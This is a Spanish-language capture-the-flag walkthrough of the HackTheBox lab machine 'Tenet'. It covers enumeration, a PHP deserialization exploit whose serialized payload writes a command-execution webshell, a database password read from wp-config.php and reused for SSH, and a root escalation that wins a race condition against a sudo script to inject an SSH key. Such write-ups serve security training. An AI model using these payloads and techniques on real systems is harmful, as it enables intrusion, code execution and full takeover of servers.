# Tenet

**OS**: Linux \
**Dificultad**: Medio \
**Puntos**: 30

## Resumen
- Gobuster
- PHP Deserialization
- Wordpress Config
- Bash Scripting

## Nmap Scan

`nmap -sC -sV -p- -oN nmap.txt 10.10.10.223`

```
Nmap scan report for 10.10.10.223
Host is up (0.067s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 cc:ca:43:d4:4c:e7:4e:bf:26:f4:27:ea:b8:75:a8:f8 (RSA)
|   256 85:f3:ac:ba:1a:6a:03:59:e2:7e:86:47:e7:3e:3c:00 (ECDSA)
|_  256 e7:e9:9a:dd:c3:4a:2f:7a:e1:e0:5d:a2:b0:ca:44:a8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## Enumeración

Enumerando los directorios con gobuster encontramos el directorio **wordpress**.

`gobuster dir -u http://10.10.10.223/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html`

![1](img/1.png)

Revisando el source code encontramos un dominio **tenet.htb**, lo agregamos a nuestro archivo hosts.

![2](img/2.png)

##### /etc/hosts
```
10.10.10.223    tenet.htb
```

Enumerando la página vemos un comentario que menciona el archivo **sator.php** y un backup.

`http://tenet.htb/index.php/2020/12/16/logs/`

![3](img/3.png)

Si accedemos al archivo se observa lo siguiente:

`http://10.10.10.223/sator.php`

![4](img/4.png)

Ya que mencionaban que existe un backup podemos descargarlo **http://10.10.10.223/sator.php.bak**, examinando el archivo vemos cosas interesantes.

```php
<?php

class DatabaseExport
{
        public $user_file = 'users.txt';
        public $data = '';

        public function update_db()
        {
                echo '[+] Grabbing users from text file <br>';
                $this-> data = 'Success';
        }


        public function __destruct()
        {
                file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
                echo '[] Database updated <br>';
        //      echo 'Gotta get this working properly...';
        }
}

$input = $_GET['arepo'] ?? '';
$databaseupdate = unserialize($input);

$app = new DatabaseExport;
$app -> update_db();

?>
```

### PHP Deserialization

Se observa que hay un parámetro **arepo** que recibe contenido serializado, podemos deducir que es posible explotar **PHP deserialization**.

Utilizando el siguiente script creamos nuestro objeto serializado que contiene una webshell.

##### serialize.php
```php
<?php

class DatabaseExport
{
        public $user_file = "doom.php";
        public $data = "<?php system(\$_GET['cmd']);?>";

        public function update_db()
        {
                $this-> data = 'Success';
        }


        public function __destruct()
        {
                file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
        }
}

$obj = new DatabaseExport();
$serial = serialize($obj);

echo $serial

?>
```

`php serialize.php`

![5](img/5.png)

Ahora nos vamos al navegador, le mandamos nuestro objeto y obtenemos una webshell.

```
http://10.10.10.223/sator.php?arepo=O:14:"DatabaseExport":2:{s:9:"user_file";s:8:"doom.php";s:4:"data";s:29:"<?php system($_GET['cmd']);?>";}
```

![6](img/6.png)

`http://10.10.10.223/doom.php?cmd=id`

![7](img/7.png)

Dentro del archivo **wordpress/wp-config.php** encontramos el password del usuario **neil**.

`view-source:http://10.10.10.223/doom.php?cmd=cat wordpress/wp-config.php`

![8](img/8.png)

```
neil : Opera2112
```

Con las credenciales obtenidas nos podemos conectar por SSH.

`ssh neil@10.10.10.223`

![9](img/9.png)

## Escalada de Privilegios

Haciendo enumeración básica es posible ejecutar como sudo el script **enableSSH.sh**.

`sudo -l`

![10](img/10.png)

El archivo tiene el siguiente contenido:

`cat /usr/local/bin/enableSSH.sh`

![11](img/11.png)

Lo más importante que podemos ver es la función addKey. Vemos que crea un directorio temporal en **/tmp/ssh-XXXXXXX** después de crear este directorio, verifica el archivo cuando no tiene un error leerá la entrada del archivo temporal y la salida se redirigirá a **/root/.ssh/authorized_keys**, cuando termine con este comando, eliminará el directorio temporal.

La forma de aprovechar esto es crear una condición de carrera mediante el uso de un bucle bash para agregar la clave SSH en el archivo temporal.

- `while true; do echo "<id_rsa>" | tee /tmp/ssh-*; done`
- `sudo /usr/local/bin/enableSSH.sh`

![12](img/12.png)

Ahora es posible acceder por SSH.

`ssh root@10.10.10.223`

![13](img/13.png)

## Referencias
https://medium.com/swlh/exploiting-php-deserialization-56d71f03282a \
https://blog.ripstech.com/2018/php-object-injection/